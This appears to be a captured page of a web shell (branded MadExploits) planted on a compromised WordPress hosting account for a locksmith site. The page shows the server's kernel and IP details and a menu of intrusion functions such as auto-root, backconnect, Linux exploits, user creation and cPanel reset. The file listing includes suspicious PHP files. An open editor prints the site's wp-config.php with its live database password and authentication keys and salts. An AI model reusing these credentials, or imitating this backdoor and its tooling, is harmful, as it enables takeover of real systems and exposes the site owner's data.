Linux server241.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 199.188.200.87 | : 216.73.216.149
Cant Read [ /etc/named.conf ]
8.0.30
emerlyju
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
emerlyju /
collingwood24hourlocksmith.services /
[ HOME SHELL ]
Name
Size
Permission
Action
.tmb
[ DIR ]
drwxrwxrwx
.well-known
[ DIR ]
drwxr-xr-x
a96dc
[ DIR ]
dr-xr-xr-x
fda2ed
[ DIR ]
drwxr-xr-x
wordpress
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.flag
46
B
-rw-r--r--
.hcflag
31
B
-rw-r--r--
.htaccess
255
B
-rwxr-xr-x
.htaccess.bk
1.01
KB
-rw-r--r--
.litespeed_flag
297
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
comment.php
12.58
KB
-rw-r--r--
error_log
3.57
MB
-rw-r--r--
google967d5673454126dd.html
53
B
-rw-r--r--
googleb38a19943cfdc373.html
53
B
-rw-r--r--
index.php0
404
B
-rw-r--r--
iqs.php
440
B
-r--r--r--
license.txt
19.44
KB
-rw-r--r--
malcare-waf.php
531
B
-rw-r--r--
minicmd.php
474
B
-rw-r--r--
readme.html
7.25
KB
-rw-r--r--
robots.txt
513
B
-r--r--r--
wib.php
95.12
KB
-rw-r--r--
wordpress-6.8.3.zip
27.23
MB
-rw-r--r--
wp-activate.php
7.18
KB
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.14
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.23
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
30.33
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-trackback.php
5.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'emerlyju_wp63' ); /** Database username */ define( 'DB_USER', 'emerlyju_wp63' ); /** Database password */ define( 'DB_PASSWORD', 'r2x0i)-Lep)!!S9A' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'ok3x3sg0vfvppc8ulalaq8nggfl9r9fu2dxka9l9beatv9ky1kokdkljpmqyvmoe' ); define( 'SECURE_AUTH_KEY', 'rphgv0cwmuuua9wby4sd8htxdzodpcscyxhsx2ceq2wium7solcydl79zle6g3bu' ); define( 'LOGGED_IN_KEY', 'dmcqfeb9gns30lxqm7kaexuutgfabghgfm692oou36kindxr5fkxpotmyaif0rp8' ); define( 'NONCE_KEY', 'pwmsvk3qfxs1mlttanin9ky3uxhsb8bid83g8e4tzs4ybrofzxoluvcc4i3jhbli' ); define( 'AUTH_SALT', '8tgudogdz7guje0ej8sxp7my6mkrbxhnk6qsuwctxix9ddhmkavxuyfnmgysjxjh' ); define( 'SECURE_AUTH_SALT', 'zocq4zkmn0hbkzxdm3fmkw9d1unqbo67mohiyb9bq3e50pgojbti8m0om5stuui6' ); define( 'LOGGED_IN_SALT', 't3lmgouaoqfxnwiblkccem29ozenw5ugv1alxoebwdnhd8qubyn9jlh5lgck9rc7' ); define( 'NONCE_SALT', 'c9zeyen9kpjatkcn3fcavjvhreey5kjlvdcmxbhoaw7tspp3ohnmgse9fjg8r5za' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wpry_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close